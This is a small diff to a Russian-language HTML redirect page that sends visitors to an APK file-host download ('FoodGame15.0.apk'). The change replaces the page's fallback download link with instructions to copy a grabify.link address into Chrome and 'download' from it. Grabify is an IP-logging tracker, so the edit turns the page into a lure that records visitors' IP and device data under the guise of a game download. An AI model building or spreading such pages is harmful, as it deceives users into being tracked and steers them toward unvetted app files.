--- a/jkafalkf.html
+++ b/jkafalkf.html
@@ -6,6 +6,6 @@
   			<meta http-equiv="refresh" content="3; URL=https://apkadmin.com/cwrqb02mhxk4/FoodGame15.0.apk.html" />
   	</head>
   	<body>
-  		<p>Вы будете перещенны на сайт загрузки. Если вы не переместилиь нажмите <a href="https://apkadmin.com/cwrqb02mhxk4/FoodGame15.0.apk.html/">СЮДА</a></p>
+  		<p>Для скачивания, выдели https://grabify.link/20MI3M эту ссылку и скопируй, потом втавь в гугл хром и скачивай</p>
   	</body>
   </html>
